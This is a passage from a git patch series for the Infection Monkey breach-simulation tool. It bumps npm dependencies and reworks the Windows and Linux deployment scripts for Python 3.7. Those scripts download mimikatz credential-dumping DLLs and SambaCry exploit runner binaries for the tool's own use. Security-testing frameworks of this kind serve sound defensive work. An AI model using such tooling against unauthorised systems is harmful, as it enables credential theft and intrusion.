"sha512-2bisHwMhxQ3XQz4LiJJwG3360pY965pTl/MRrZYxIBKVj4fOHoDs5aZAkYXGxDRO1Li+SyjTAilQEbOmtQJHzA==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1", @@ -15667,14 +15666,14 @@ } }, "react-dom": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.9.0.tgz", - "integrity": "sha512-YFT2rxO9hM70ewk9jq0y6sQk8cL02xm4+IzYBz75CQGlClQQ1Bxq0nhHF6OtSbit+AIahujJgb/CPRibFkMNJQ==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.10.1.tgz", + "integrity": "sha512-SmM4ZW0uug0rn95U8uqr52I7UdNf6wdGLeXDmNLfg3y5q5H9eAbdjF5ubQc3bjDyRrvdAB2IKG7X0GzSpnn5Mg==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1", "prop-types": "15.7.2", - "scheduler": "0.15.0" + "scheduler": "0.16.1" } }, "react-event-timeline": { @@ -15719,9 +15718,9 @@ } }, "react-hot-loader": { - "version": "4.12.13", - "resolved": "https://registry.npmjs.org/react-hot-loader/-/react-hot-loader-4.12.13.tgz", - "integrity": "sha512-4Byk3aVQhcmTnVCBvDHOEOUnMFMj81r2yRKZQSfLOG2yd/4hm/A3oK15AnCZilQExqSFSsHcK64lIIU+dU2zQQ==", + "version": "4.12.14", + "resolved": "https://registry.npmjs.org/react-hot-loader/-/react-hot-loader-4.12.14.tgz", + "integrity": "sha512-ecxH4eBvEaJ9onT8vkEmK1FAAJUh1PqzGqds9S3k+GeihSp7nKAp4fOxytO+Ghr491LiBD38jaKyDXYnnpI9pQ==", "dev": true, "requires": { "fast-levenshtein": "2.0.6", @@ -15746,7 +15745,7 @@ "integrity": "sha512-0XsbTXxgiaCDYDIWFcwkmerZPSwywfUqYmwT4jzewKTQSWoE6FCMoUVOeBJWK3E/CrWbxRG3m5GzY4lnIwGRBA==", "dev": true, "requires": { - "react-is": "16.9.0" + "react-is": "16.10.1" } }, "json5": { @@ -15770,9 +15769,9 @@ } }, "react-is": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.9.0.tgz", - "integrity": "sha512-tJBzzzIgnnRfEm046qRcURvwQnZVXmuCbscxUO5RWrGTXpon2d4c8mI0D8WE6ydVIm29JiLB6+RslkIvym9Rjw==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.10.1.tgz", + "integrity": "sha512-BXUMf9sIOPXXZWqr7+c5SeOKJykyVr2u0UDzEf4LNGc6taGkQe1A9DFD07umCIXz45RLr9oAAwZbAJ0Pkknfaw==", "dev": true }, "source-map": { @@ -16008,9 +16007,9 @@ } }, "react-toggle": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/react-toggle/-/react-toggle-4.0.2.tgz", - "integrity": "sha512-EPTWnN7gQHgEAUEmjheanZXNzY5TPnQeyyHfEs3YshaiWZf5WNjfYDrglO5F1Hl/dNveX18i4l0grTEsYH2Ccw==", + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/react-toggle/-/react-toggle-4.1.1.tgz", + "integrity": "sha512-+wXlMcSpg8SmnIXauMaZiKpR+r2wp2gMUteroejp2UTSqGTVvZLN+m9EhMzFARBKEw7KpQOwzCyfzeHeAndQGw==", "requires": { "classnames": "2.2.6" } @@ -16706,9 +16705,9 @@ } }, "scheduler": { - "version": "0.15.0", - "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.15.0.tgz", - "integrity": "sha512-xAefmSfN6jqAa7Kuq7LIJY0bwAPG3xlCj0HMEBQk1lxYiDKZscY2xJ5U/61ZTrYbmNQbXa+gc7czPkVo11tnCg==", + "version": "0.16.1", + "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.16.1.tgz", + "integrity": "sha512-MIuie7SgsqMYOdCXVFZa8SKoNorJZUWHW8dPgto7uEHn1lX3fg2Gu0TzgK8USj76uxV7vB5eRMnZs/cdEHg+cg==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1" @@ -17936,20 +17935,20 @@ } }, "terser": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/terser/-/terser-4.3.1.tgz", - "integrity": "sha512-pnzH6dnFEsR2aa2SJaKb1uSCl3QmIsJ8dEkj0Fky+2AwMMcC9doMqLOQIH6wVTEKaVfKVvLSk5qxPBEZT9mywg==", + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/terser/-/terser-4.3.4.tgz", + "integrity": "sha512-Kcrn3RiW8NtHBP0ssOAzwa2MsIRQ8lJWiBG/K7JgqPlomA3mtb2DEmp4/hrUA+Jujx+WZ02zqd7GYD+QRBB/2Q==", "dev": true, "requires": { - "commander": "2.20.0", + "commander": "2.20.1", "source-map": "0.6.1", "source-map-support": "0.5.13" }, "dependencies": { "commander": { - "version": "2.20.0", - "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.0.tgz", - "integrity": "sha512-7j2y+40w61zy6YC2iRNpUe/NwhNyoXrYpHMrSunaMG64nRnaf96zO/KMQR4OyN/UnE5KLyEBnKHd4aG3rskjpQ==", + "version": "2.20.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.1.tgz", + "integrity": "sha512-cCuLsMhJeWQ/ZpsFTbE765kvVfoeSddc4nU3up4fV+fDBcfUXnbITJ+JzhkdjzOqhURjZgujxaioam4RM9yGUg==", "dev": true }, "source-map": { @@ -17982,7 +17981,7 @@ "schema-utils": "1.0.0", "serialize-javascript": "1.9.1", "source-map": "0.6.1", - "terser": "4.3.1", + "terser": "4.3.4", "webpack-sources": "1.4.3", "worker-farm": "1.7.0" }, @@ -19710,9 +19709,9 @@ } }, "webpack": { - "version": "4.40.2", - "resolved": "https://registry.npmjs.org/webpack/-/webpack-4.40.2.tgz", - "integrity": "sha512-5nIvteTDCUws2DVvP9Qe+JPla7kWPPIDFZv55To7IycHWZ+Z5qBdaBYPyuXWdhggTufZkQwfIK+5rKQTVovm2A==", + "version": "4.41.0", + "resolved": "https://registry.npmjs.org/webpack/-/webpack-4.41.0.tgz", + "integrity": "sha512-yNV98U4r7wX1VJAj5kyMsu36T8RPPQntcb5fJLOsMz/pt/WrKC0Vp1bAlqPLkA1LegSwQwf6P+kAbyhRKVQ72g==", "dev": true, "requires": { "@webassemblyjs/ast": "1.8.5", diff --git a/monkey/monkey_island/cc/ui/package.json b/monkey/monkey_island/cc/ui/package.json index aa85164ce..6743638d5 100644 --- a/monkey/monkey_island/cc/ui/package.json +++ b/monkey/monkey_island/cc/ui/package.json @@ -37,7 +37,7 @@ "css-loader": "^1.0.1", "eslint": "^5.16.0", "eslint-loader": "^2.2.1", - "eslint-plugin-react": "^7.14.3", + "eslint-plugin-react": "^7.15.1", "file-loader": "^1.1.11", "glob": "^7.1.4", "html-loader": "^0.5.5", @@ -56,11 +56,11 @@ "phantomjs-prebuilt": "^2.1.16", "react-addons-test-utils": "^15.6.2", "react-event-timeline": "^1.6.3", - "react-hot-loader": "^4.12.13", + "react-hot-loader": "^4.12.14", "rimraf": "^2.7.1", "style-loader": "^0.22.1", "url-loader": "^1.1.2", - "webpack": "^4.40.2", + "webpack": "^4.41.0", "webpack-cli": "^3.3.9", "webpack-dev-server": "^3.8.1" }, @@ -74,7 +74,7 @@ "downloadjs": "^1.4.7", "fetch": "^1.1.0", "file-saver": "^2.0.2", - "filepond": "^4.7.1", + "filepond": "^4.7.2", "js-file-download": "^0.4.8", "json-loader": "^0.5.7", "jwt-decode": "^2.2.0", @@ -85,13 +85,13 @@ "pluralize": "^7.0.0", "prop-types": "^15.7.2", "rc-progress": "^2.5.2", - "react": "^16.9.0", + "react": "^16.10.1", "react-bootstrap": "^0.32.4", "react-copy-to-clipboard": "^5.0.1", "react-data-components": "^1.2.0", "react-desktop-notification": "^1.0.9", "react-dimensions": "^1.3.0", - "react-dom": "^16.9.0", + "react-dom": "^16.10.1", "react-fa": "^5.0.0", "react-filepond": "^7.0.1", "react-graph-vis": "^1.0.2", @@ -101,7 +101,7 @@ "react-router-dom": "^4.3.1", "react-spinners": "^0.5.13", "react-table": "^6.10.3", - "react-toggle": "^4.0.1", + "react-toggle": "^4.1.1", "react-tooltip-lite": "^1.10.0", "redux": "^4.0.4", "sass-loader": "^7.3.1", From 97542107dc657dd312d9da472c71e2b99208661c Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 3 Oct 2019 17:20:14 +0300 Subject: [PATCH 11/53] Fixed bug that caused PATH not to be refreshed after python installation --- deployment_scripts/deploy_windows.ps1 | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index c7192a4c8..87d6bc8cf 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -56,13 +56,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Select 'add to PATH' when installing" $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop - $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User") Remove-Item $TEMP_PYTHON_INSTALLER # Check if installed correctly $version = cmd.exe /c '"python" --version 2>&1' if ( $version -like '* is not recognized*' ) { - "Python is not found in PATH. If you just installed python you need to restart cmd. - Else, add it manually or reinstall python." + "Python is not found in PATH. Add it to PATH and relaunch the script." return } } From dff71eabc4fedb5b8a3b09c17e691cd43da4dae8 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Mon, 7 Oct 2019 09:53:18 +0300 Subject: [PATCH 12/53] Added C++ redistributable required for windows and brought back UPX --- deployment_scripts/config.ps1 | 5 +++++ deployment_scripts/deploy_windows.ps1 | 19 +++++++++++++++++++ monkey/infection_monkey/monkey.spec | 1 + 3 files changed, 25 insertions(+) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index a3dafc66e..095f7b899 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 @@ -29,13 +29,18 @@ $MK64_DLL = "mk64.zip" $TEMP_PYTHON_INSTALLER = ".\python.exe" $TEMP_MONGODB_ZIP = ".\mongodb.zip" $TEMP_OPEN_SSL_ZIP = ".\openssl.zip" +$TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" +$TEMP_UPX_ZIP = "upx.zip" +$UPX_FOLDER = "upx394w" # Other url's $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" +$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" $PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe" $MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip" $MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip" +$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 87d6bc8cf..0403185ff 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -107,6 +107,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP + # Download and install C++ redistributable + "Downloading C++ redistributable ..." + $webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER) + Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop + Remove-Item $TEMP_CPP_INSTALLER + # Generate ssl certificate "Generating ssl certificate" Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR) @@ -158,6 +164,19 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin") New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue + # Download upx + if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){ + "Downloading upx ..." + $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP) + "Unzipping upx" + Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue + Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir + # Remove unnecessary files + Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER) + "Removing zip file" + Remove-Item $TEMP_UPX_ZIP + } + # Download mimikatz binaries $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL if(!(Test-Path -Path $mk32_path )){ diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec index e35fd2630..9c5fa9a18 100644 --- a/monkey/infection_monkey/monkey.spec +++ b/monkey/infection_monkey/monkey.spec @@ -38,6 +38,7 @@ def main(): debug=False, strip=get_exe_strip(), upx=True, + upx_exclude=['vcruntime140.dll'], console=True, icon=get_exe_icon()) From 6245be15ebc0ea280e1dfa9b970b2a63788fd681 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Mon, 7 Oct 2019 16:24:15 +0300 Subject: [PATCH 13/53] Automatically adds python scripts to path so user could use pyinstaller off the bat --- deployment_scripts/deploy_windows.ps1 | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 0403185ff..5a21c4daa 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -75,12 +75,20 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, } "Installing python packages for island" - $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop + $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop & python -m pip install --user -r $islandRequirements "Installing python packages for monkey" $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt" & python -m pip install --user -r $monkeyRequirements + $user_python_dir = cmd.exe /c 'py -m site --user-site' + $user_python_dir = Join-Path (Split-Path $user_python_dir) -ChildPath "\Scripts" + if(!($ENV:PATH | Select-String -SimpleMatch $user_python_dir)){ + "Adding python scripts path to user's env" + $env:Path += ";"+$user_python_dir + [Environment]::SetEnvironmentVariable("Path",$env:Path,"User") + } + # Download mongodb if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "mongodb") )){ "Downloading mongodb ..." From eaee0451c50d802f73c370e519d45c31501c5cb1 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 9 Oct 2019 11:23:20 +0300 Subject: [PATCH 14/53] Linux dev. env. deployment altered to support py3 --- deployment_scripts/config | 6 ++ deployment_scripts/deploy_linux.sh | 70 ++++++++++++------- .../infection_monkey/requirements_linux.txt | 4 +- monkey/monkey_island/linux/install_mongo.sh | 3 +- monkey/monkey_island/linux/run.sh | 16 ++++- monkey/monkey_island/requirements.txt | 1 - 6 files changed, 68 insertions(+), 32 deletions(-) diff --git a/deployment_scripts/config b/deployment_scripts/config index bb10ed105..fb7a3d5b6 100644 --- a/deployment_scripts/config +++ b/deployment_scripts/config @@ -14,6 +14,12 @@ WINDOWS_32_BINARY_NAME="monkey-windows-32.exe" WINDOWS_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe" WINDOWS_64_BINARY_NAME="monkey-windows-64.exe" +# Other binaries for monkey +TRACEROUTE_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute64" +TRACEROUTE_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute32" +SAMBACRY_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner64.so" +SAMBACRY_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner32.so" + # Mongo url's MONGO_DEBIAN_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-debian81-latest.tgz" MONGO_UBUNTU_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1604-latest.tgz" diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 4df8ba114..136e3f8b1 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -11,9 +11,9 @@ fi ISLAND_PATH="$monkey_home/monkey/monkey_island" MONKEY_COMMON_PATH="$monkey_home/monkey/common/" MONGO_PATH="$ISLAND_PATH/bin/mongodb" -MONGO_BIN_PATH="$MONGO_PATH/bin" -ISLAND_DB_PATH="$ISLAND_PATH/db" ISLAND_BINARIES_PATH="$ISLAND_PATH/cc/binaries" +INFECTION_MONKEY_DIR="$monkey_home/monkey/infection_monkey" +MONKEY_BIN_DIR="$INFECTION_MONKEY_DIR/bin" handle_error () { echo "Fix the errors above and rerun the script" @@ -52,25 +52,39 @@ fi # Create folders log_message "Creating island dirs under $ISLAND_PATH" -mkdir -p ${MONGO_BIN_PATH} -mkdir -p ${ISLAND_DB_PATH} +mkdir -p ${MONGO_PATH} mkdir -p ${ISLAND_BINARIES_PATH} || handle_error -python_version=`python --version 2>&1` -if [[ ${python_version} == *"command not found"* ]] || [[ ${python_version} != *"Python 2.7"* ]]; then - echo "Python 2.7 is not found or is not a default interpreter for 'python' command..." - exit 1 +# Detecting command that calls python 3.7 +python_cmd="" +if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python" +fi +if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python37" +fi +if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python3.7" +fi + +if [[ ${python_cmd} == "" ]]; then + log_message "Python 3.7 command not found. Installing python 3.7." + sudo add-apt-repository ppa:deadsnakes/ppa + sudo apt install python3.7 + log_message "Python 3.7 is now available with command 'python3.7'." + python_cmd="python3.7" fi log_message "Updating package list" sudo apt-get update log_message "Installing pip" -sudo apt-get install python-pip +sudo apt install python3-pip +${python_cmd} -m pip install pip log_message "Installing island requirements" requirements="$ISLAND_PATH/requirements.txt" -python -m pip install --user -r ${requirements} || handle_error +${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error # Download binaries log_message "Downloading binaries" @@ -89,7 +103,7 @@ linux_dist=`lsb_release -a 2> /dev/null` # If a user haven't installed mongo manually check if we can install it with our script log_message "Installing MongoDB" -${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_BIN_PATH} || handle_error +${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_PATH} || handle_error log_message "Installing openssl" sudo apt-get install openssl @@ -106,32 +120,38 @@ openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/ser sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error ${ISLAND_PATH}/linux/create_certificate.sh || handle_error +# Update node +log_message "Installing nodejs" +sudo apt-get install -y nodejs + # Install npm log_message "Installing npm" sudo apt-get install npm - -# Update node -log_message "Updating node" -curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash - -sudo apt-get install -y nodejs +npm update log_message "Generating front end" cd "$ISLAND_PATH/cc/ui" || handle_error -npm update npm run dist # Monkey setup log_message "Installing monkey requirements" -sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1 +sudo apt-get install python-dev libffi-dev upx libssl-dev libc++1 cd ${monkey_home}/monkey/infection_monkey || handle_error -python -m pip install --user -r requirements_linux.txt || handle_error +${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error + +# Making dir for binaries +mkdir ${MONKEY_BIN_DIR} + +# Download sambacry binaries +log_message "Downloading sambacry binaries" +wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_64_BINARY_URL} +wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_32_BINARY_URL} + +# Download traceroute binaries +log_message "Downloading tracerout binaries" +wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_64_BINARY_URL} +wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_32_BINARY_URL} -# Build samba -log_message "Building samba binaries" -sudo apt-get install gcc-multilib -cd ${monkey_home}/monkey/infection_monkey/exploit/sambacry_monkey_runner -sudo chmod +x ./build.sh || handle_error -./build.sh sudo chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh diff --git a/monkey/infection_monkey/requirements_linux.txt b/monkey/infection_monkey/requirements_linux.txt index f30131267..9dc66a787 100644 --- a/monkey/infection_monkey/requirements_linux.txt +++ b/monkey/infection_monkey/requirements_linux.txt @@ -1,11 +1,10 @@ -enum34 impacket pycryptodome cffi requests odict paramiko -psutil==3.4.2 +psutil PyInstaller six ecdsa @@ -14,4 +13,3 @@ ipaddress wmi pymssql pyftpdlib -enum34 diff --git a/monkey/monkey_island/linux/install_mongo.sh b/monkey/monkey_island/linux/install_mongo.sh index 2395454b6..478d7e0ed 100755 --- a/monkey/monkey_island/linux/install_mongo.sh +++ b/monkey/monkey_island/linux/install_mongo.sh @@ -10,7 +10,7 @@ then elif [[ ${os_version_monkey} == "Ubuntu 18.04"* ]] ; then echo Detected Ubuntu 18.04 - export tgz_url="https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1804-4.0.8.tgz" + export tgz_url="https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1804-4.2.0.tgz" elif [[ ${os_version_monkey} == "Debian GNU/Linux 8"* ]] ; then echo Detected Debian 8 @@ -31,6 +31,7 @@ tar -xf mongodb.tgz popd mkdir -p ${MONGODB_DIR}/bin +mkdir -p ${MONGODB_DIR}/db cp ${TEMP_MONGO}/mongodb-*/bin/mongod ${MONGODB_DIR}/bin/mongod cp ${TEMP_MONGO}/mongodb-*/LICENSE-Community.txt ${MONGODB_DIR}/ chmod a+x ${MONGODB_DIR}/bin/mongod diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index 978e02fe5..235b30469 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -1,4 +1,16 @@ #!/bin/bash -cd /var/monkey -/var/monkey/monkey_island/bin/python/bin/python monkey_island.py \ No newline at end of file +# Detecting command that calls python 3.7 +python_cmd="" +if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python" +fi +if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python37" +fi +if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python3.7" +fi + +./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db +${python_cmd} monkey_island.py \ No newline at end of file diff --git a/monkey/monkey_island/requirements.txt b/monkey/monkey_island/requirements.txt index 49c1e37a5..c6088a3ea 100644 --- a/monkey/monkey_island/requirements.txt +++ b/monkey/monkey_island/requirements.txt @@ -1,4 +1,3 @@ -bson python-dateutil tornado werkzeug From 05af080f98e24dbb1bc23667e6523fede2822a84 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 17 Oct 2019 18:06:01 +0300 Subject: [PATCH 15/53] Linux deployment fixes --- deployment_scripts/deploy_linux.sh | 4 ++++ monkey/infection_monkey/exploit/sshexec.py | 1 - monkey/monkey_island/linux/run.sh | 2 +- 3 files changed, 5 insertions(+), 2 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 136e3f8b1..f3cc4001c 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -70,6 +70,7 @@ fi if [[ ${python_cmd} == "" ]]; then log_message "Python 3.7 command not found. Installing python 3.7." sudo add-apt-repository ppa:deadsnakes/ppa + sudo apt update sudo apt install python3.7 log_message "Python 3.7 is now available with command 'python3.7'." python_cmd="python3.7" @@ -82,6 +83,9 @@ log_message "Installing pip" sudo apt install python3-pip ${python_cmd} -m pip install pip +log_message "Install python3.7-dev" +sudo apt-get install python3.7-dev + log_message "Installing island requirements" requirements="$ISLAND_PATH/requirements.txt" ${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py index f7abd3ce0..9765f018c 100644 --- a/monkey/infection_monkey/exploit/sshexec.py +++ b/monkey/infection_monkey/exploit/sshexec.py @@ -5,7 +5,6 @@ import time import paramiko import infection_monkey.monkeyfs as monkeyfs -from common.utils.exploit_enum import ExploitType from infection_monkey.exploit import HostExploiter from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline from infection_monkey.exploit.tools.helpers import get_interface_to_target diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index 235b30469..26d8c3234 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -13,4 +13,4 @@ if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then fi ./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db -${python_cmd} monkey_island.py \ No newline at end of file +${python_cmd} monkey_island.py From e52491aef5ca32cc66c131fa37a589540953b65e Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 23 Oct 2019 10:17:47 +0300 Subject: [PATCH 16/53] Small linux deployment script improvement --- deployment_scripts/deploy_linux.sh | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index f3cc4001c..70ca2e5e3 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -90,6 +90,11 @@ log_message "Installing island requirements" requirements="$ISLAND_PATH/requirements.txt" ${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error +log_message "Installing monkey requirements" +sudo apt-get install libffi-dev upx libssl-dev libc++1 +cd ${monkey_home}/monkey/infection_monkey || handle_error +${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error + # Download binaries log_message "Downloading binaries" wget -c -N -P ${ISLAND_BINARIES_PATH} ${LINUX_32_BINARY_URL} @@ -137,12 +142,6 @@ log_message "Generating front end" cd "$ISLAND_PATH/cc/ui" || handle_error npm run dist -# Monkey setup -log_message "Installing monkey requirements" -sudo apt-get install python-dev libffi-dev upx libssl-dev libc++1 -cd ${monkey_home}/monkey/infection_monkey || handle_error -${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error - # Making dir for binaries mkdir ${MONKEY_BIN_DIR} From fbe9708da654a6190438af7a83bb351cc870129d Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 23 Oct 2019 14:46:59 +0300 Subject: [PATCH 17/53] Removed ppa, unused certificate generation, updated readme --- deployment_scripts/README.md | 2 +- deployment_scripts/deploy_linux.sh | 14 +++----------- monkey/monkey_island/linux/run.sh | 4 ++-- monkey/monkey_island/readme.txt | 10 +++++----- 4 files changed, 11 insertions(+), 19 deletions(-) diff --git a/deployment_scripts/README.md b/deployment_scripts/README.md index 10027edce..0faf95a52 100644 --- a/deployment_scripts/README.md +++ b/deployment_scripts/README.md @@ -16,7 +16,7 @@ Don't forget to add python to PATH or do so while installing it via this script. You must have root permissions, but don't run the script as root.
Launch deploy_linux.sh from scripts directory.
First argument should be an empty directory (script can create one, default is ./infection_monkey) and second is the branch you want to clone (develop by default). -Choose a directory where you have all the relevant permissions, for e.g. /home/your_username +Choose a directory where you have all the relevant permissions and give it's absolute path, for e.g. /home/your_username Example usages:
./deploy_linux.sh (deploys under ./infection_monkey)
./deploy_linux.sh "/home/test/monkey" (deploys under /home/test/monkey)
diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 70ca2e5e3..5e191d5fe 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -69,9 +69,8 @@ fi if [[ ${python_cmd} == "" ]]; then log_message "Python 3.7 command not found. Installing python 3.7." - sudo add-apt-repository ppa:deadsnakes/ppa - sudo apt update - sudo apt install python3.7 + sudo apt-get update + sudo apt-get install python3.7 log_message "Python 3.7 is now available with command 'python3.7'." python_cmd="python3.7" fi @@ -119,13 +118,6 @@ sudo apt-get install openssl # Generate SSL certificate log_message "Generating certificate" -cd ${ISLAND_PATH} || handle_error -openssl genrsa -out cc/server.key 1024 || handle_error -openssl req -new -key cc/server.key -out cc/server.csr \ --subj "/C=GB/ST=London/L=London/O=Global Security/OU=Monkey Department/CN=monkey.com" || handle_error -openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt || handle_error - - sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error ${ISLAND_PATH}/linux/create_certificate.sh || handle_error @@ -151,7 +143,7 @@ wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_64_BINARY_URL} wget 